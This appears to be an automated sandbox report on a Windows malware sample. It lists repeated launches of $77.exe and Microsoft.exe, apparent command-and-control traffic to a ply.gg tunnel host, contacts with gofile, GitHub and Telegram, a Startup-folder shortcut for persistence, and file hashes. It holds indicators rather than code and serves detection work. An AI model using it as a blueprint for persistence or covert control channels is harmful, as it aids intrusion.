C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\ProgramData\$77

C:\ProgramData\$77

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gofile.io udp
FR 51.178.66.33:443 gofile.io tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 s.gofile.io udp
FR 51.75.242.210:443 s.gofile.io tcp
FR 51.75.242.210:443 s.gofile.io tcp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 store1.gofile.io udp
US 8.8.8.8:53 210.242.75.51.in-addr.arpa udp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 8.8.8.8:53 227.123.112.45.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 authority-amazon.gl.at.ply.gg udp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f53207a5ca2ef5c7e976cbb3cb26d870
SHA1 49a8cc44f53da77bb3dfb36fc7676ed54675db43
SHA256 19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23
SHA512 be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499

\??\pipe\LOCAL\crashpad_1460_EGGUVVXZFHGSRYRP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ae54e9db2e89f2c54da8cc0bfcbd26bd
SHA1 a88af6c673609ecbc51a1a60dfbc8577830d2b5d
SHA256 5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af
SHA512 e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 52208df084964b3f3f096b1d0b7124aa
SHA1 7974ee7a887e3e2fdb4969a5a31b2f2df12bb32a
SHA256 bf6944d5f848a9acd90feacf9ff298ff5c2c1c21e454b6abcc99770f34edc16a
SHA512 618532b87efb60b4cbcd9b82b4316c71ce4332c97c2bae5ab5c9a47e421b6d89729d213582457a6ae0ab63f4f2bf7c6fb659943442f0ce45afc347c856fb6586

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\Downloads\Unconfirmed 956282.crdownload

MD5 5273c9f0a68605f043bacdf7a81faecf
SHA1 ca9028398da6f88dafa157bf6b126e2bc8e48f13
SHA256 06527a5d56ce163825bd94e07de31b8bc4e97c44dc006f060c63062fec2db168
SHA512 de4799845318d4f8902b1f1cdfb780382bd796b122acd975eaa7cfad971dba9628c3a7f5403455c5ca4f72cfe8cfbbbde3a68ab8e567f0349ffe9a2c4ff706bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 863ef0a62d09744f34e64f809023b982
SHA1 f34315d2e719d63f8abdacd93ac0e66be5f575e3
SHA256 f8979dcd6314cb31589d84c58b665facd6c83a1793bc7d9c68a606bcacd32689
SHA512 3a74d7fb1f4e9512c772e67419bf0f433ba1149c1194fa65e40615ef210bebc7b95e01b7de8c79ae3c2529d3ec06de1542fa98562d7f43b75ea2f3e1db1d1c21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0411ad16bea649847357850fd470a9ec
SHA1 475dc19f67d047fd8e344cbe31c7b1f995b5c5ca
SHA256 83d55d906d5866995727fac7313c1c21846df83dfc7b72e11ec6d545431972da
SHA512 90422adf5729c313123b493447219aa3a552f6f7fb3b2b7fae10f168a461b8f64ffc16f067ad283b57cf79e8496c51bef43ccb42bb41202ab7728f39903cdf3c

memory/5164-93-0x000001B984B50000-0x000001B984B72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0ret4sz.5ub.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 eac98e72b261990fa9e900e1d6da3837
SHA1 8b98be67638235c7fc28038773e8330fe8fb6d88
SHA256 5edf511f2d0cbb631361fae9d202c728e1ee0c610e28098e145b97b75efaccb4
SHA512 b92814882e12be90395ffe51440e343c8bcc2f9b4600bc5ef7e8c12ffb88f973275d1a4f28f53e57f3abc19a48277d003d9002e9fa220a55a808aa394fa7ee78

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 14de68d7a317ad644b6ef887e0182491
SHA1 1ff476a6c3fb9b006e873ba2482865cb9c6caed5
SHA256 bdf1006cd8b92cb88266fa7337f4473dfa40ee27f1ab0e3addab539ad3446783
SHA512 9162b366ed2f17a20456938d3df16c9b7c79c9ff6b063a2cf344807138fc5fba41e9f8c7bc209634cf2ab8464b66c25c3480cd695a0936ce17eb840375831562

memory/5388-121-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-122-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-123-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-127-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-133-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-132-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-131-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-130-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-129-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-128-0x000002678E830000-0x000002678E831000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

MD5 19aff7e3b7e3bce2bc35e60f72df0e85
SHA1 cf81454aa5cd0aad035275e64a71bf45b7cb261a
SHA256 f0c875a630f2633efb93d5a66437c6f4894f2da6d5c7ec352115d686a199ce07
SHA512 49b44e20099682b471ae0478c5db73d5b2e76aa1984b30fb95f7590cd636fcbe6dc4b41063882997dcd891ad96936cde56688783a92b07bbe637b6713f56eda0

memory/5844-157-0x00000000008B0000-0x00000000008E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$77.exe

MD5 6010709a7e1c771b74dbc2602af399f5
SHA1 b417a1d746ddfa7fe039a01bf6b87de60da335cc
SHA256 4352b9094b17df14a12af21dacc67d4b7661ca03f4b1492e847833ff3d77e4b5
SHA512 26538ee5351ca5242b9bbb2bfc6cae661bb2e5c52204109d3cd880505ea618bb8bf248e8b15518ee499bc0c0e87a054ea97c78217b1e91a86c2e2c7348a28d1d

memory/5968-171-0x0000000000DE0000-0x0000000000DF0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 48f8b55d9610e3971015e6a2a586f2c5
SHA1 e33a511543f2a85d6076a84dedabf6fc5c9cf89d
SHA256 fff1a83296dc31250f3e9c54b614c6f85fc44f3effc684173b826eb1b667c2dd
SHA512 5d9b1debeb1260738bb535d85eb7d4321a418b58e36ff658b3dcad564d6b6d8e1bc986efe024c01db8240e012a892627c3a976ecee15fb0d50418a9afa9730f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 316b8ffe7e5dc6add3a2b036e112e675
SHA1 9351953aeb5cb6b82600d45e465872dd60dd2d5c
SHA256 4e419a44acbcda32a59b7b090e6a2e357a84cb78f1fa1f1be79a2ac4245d50ac
SHA512 5fcbe58eea16e157f0d2595a2304e249cb7a3aab5516d58600ef828bb36766d5a149554fbe41ab0bc09df89da9be8538a490599ce02e23ff845053af78bebe4d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Microsoft.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a115771c01b1507a1846f0dc6687a492
SHA1 c6dd34f87bd8fe6c4af77e9fa02e7b1cf58bd41f
SHA256 a3409692b7dfa70b0f083a5d73230eaaaf55c7c3e74ec5399c5b3f09e05219a5
SHA512 1bc6d51f48aa4e4013378887aa9e0bb91b30e5618bae6c15c45526ba861971c749a0778291d3f5515bfd75626c573d0f3c0110501166e60df176af2fcc89698c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bedb5025bf1eff6f585b07d364e6fdf3
SHA1 14f8df0938b32838135a78f6160577f02475eef1
SHA256 642b0c6cc8ab92c8e2769bed0859a8f80b242f0a7b5c1be7fd53424fd56c2d5b
SHA512 2111544b7f99f12b14547837ebb4f00ec968daa1153a5077de130c849aba63b53e8d23918690b944fec2958ca33a479f306dbac7b9b01b5c6a9c8a3903cccd4a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dd1d0b083fedf44b482a028fb70b96e8
SHA1 dc9c027937c9f6d52268a1504cbae42a39c8d36a
SHA256 cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c
SHA512 96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2c8179aaa149c0b9791b73ce44c04d1
SHA1 703361b0d43ec7f669304e7c0ffbbfdeb1e484ff
SHA256 c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a
SHA512 2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk

MD5 7b9c5c3e28db7ebdd3fc80ea9c93be9e
SHA1 bc06ac54e9f5dcb16702ff3c595ce253a5dbe450
SHA256 24d2b087f342f2edfffbecedc430623dd78eaef083536448151d88a8a65f7366
SHA512 70027ab7e28dfea808ac46e94a5b6b3cb00b0f0e06236d45e013db00dd8e779747a3d30b6bb7136077f8b04737b421459b4eaee5e1a608d457d076fcff8824f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 afc6cddd7e64d81e52b729d09f227107
SHA1 ad0d3740f4b66de83db8862911c07dc91928d2f6
SHA256 b5e81a7c7d80feaaa10ee7bc8aaef9f21a5c1e4b03b3823ed115022311d674a0
SHA512 844edb69585153c378a7c97709983776fc9303a32fb5ef8122ecca32adfc0b265f5ef7118ee07814da5c020ac7ba1bf2a2f66d46312e4d8e6df99aab2e5f9b2a